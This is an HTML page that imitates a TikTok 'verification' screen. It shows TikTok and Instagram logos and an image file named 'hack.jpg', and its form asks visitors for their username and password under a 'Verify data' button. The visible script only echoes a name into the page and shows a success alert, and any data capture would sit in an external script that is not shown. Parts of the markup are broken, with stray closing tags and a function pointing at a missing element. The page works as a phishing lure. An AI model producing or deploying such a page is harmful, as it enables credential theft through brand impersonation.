<!DOCTYPE html>
<html>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <head>
    
    <style>
    *{
      margin: 0px;
    }
      .header{
        z-index: 1;
        position: fixed;
        width: 100%;
        height: 70px;
        background-color:white;
      }
      .div{
        background: linear-gradient(to right, #ece9e6, #ffffff);
        width: 100%;
        height: 1000px;
        
      }
      .header h3{
        
        color:black;
        text-align: center;
        margin-top: 20px;
      }
      .div1{
        border-radius: 10px;
        box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;
        transform:translate(20%,30%) ;
        width: 72%;
        height: 500px;
        background-color: white;
      }
      .img1{
        border:4px solid #33d8da;
        transform:translate(100%,20%) ;
        width:82px;
        height: 80px;
        border-radius: 50%;
      }
       .img2{
         float: right;
      transform:translate(-450%,-130%) ;
        margin: 3px;
        width:15px;
      }
      .h4{
        text-align: center;
        margin-top: 18px;
      }
      .button{
        color: white;
        background-color:  #ff2640;
        width: 40%;
        border-radius: 3px;
        border:0px;
        padding:8px 5px;
        
      }
      .img3{
        border-radius: 5px;
        transform:translate(0%,35%) ;
        width: 10%;
        border:1px solid black;
      }
      .option{
       
        border-radius: 5px;
        outline: 0;
        width: 30px;
        height: 30px;
      }
      .div4{
        transform:translate(17%,3%) ;
      }
     .hr{
       transform:translate(23%,0%);
       width: 69%;
       height: 2px;
       border:0px;
       background-color: #33d8da;
     }
     input{
       margin:5px 5px 0px 0px;
       transform:translate(23%,0%);
       border: 0px;
       outline: 0px;
     }
     .button1{
       transform:translate(77%,0%);
       color: white;
        background-color:   #33d8da;
        width: 40%;
        border-radius: 3px;
        border:0px;
        padding:5px 5px;
     }
     .img5{
       
       transform:translate(340%,12%);
       
       width: 50px;
     }
    </style>
  </head>
  <body>
    <header class="header">
      <img class="img5" src="TikTok.png"/></header>
    <div class="div">
      <div class="div1">
        <img id="img" class="img1" src="hack.jpg">
       
        <br>
        <div>
          <h4  id="name" class="h4">@Verify.name</h4>
          
          <img  class="img2" src="Token.svg">
        </div>
        
        <br>
        <div class="div4">
        <span><button class="button">verification</button></span>
        <span><img class="img3" src="insta.png"></span>
        <span>
<select class="option">
          <option></option>
          <option><h3>website</h3></option>
          <option><h3>website</h3></option>
          <option><h3>website</h3></option>
          <option><h3>website</h3></option>
          <option><h3>website</h3></option>
          <option><h3>website</h3></option>
          </select>
          </span>
          <option></option>
          </select></span>
          </div>
          <br>
          <form action="" onsubmit=" return xnmap()">
          <input type="text" id="xnmap3" placeholder="Add username" required>
          <hr class="hr">
    
          <input type="password" id="xnmap4" placeholder="Add password" required>
          <hr class="hr" >
          <br>
          <input class="button1" type="submit" onclick="xnmap()" value="Verify data" >
          </form>
         <br>
         <input class="name" type="text" id="name1" placeholder="name" maxlength="15" minlength="0" required>
         <hr class="hr" >
         <br>
         <button class="button1"  onclick="xnmap()" type="button">Add name</button>
         
          
      </div>
    </div>
      <script src="TikTok.js"></script>
      <script>
        function xnmap(){
      
         var xnmap = document.getElementById("name1").value;
       var hm =  document.getElementById("name").innerHTML=xnmap;
         if(xnmap==hm){
           alert("Verified successfully");
         }else{
           alert(1234);
         }
        }
        
        
      </script>
      <script>
        function oky(){
          
       var change1 = document.getElementById("file").value;
       
          document.getElementById("img").innerHTML=change1;
        }
      </script>
  </body>
</html>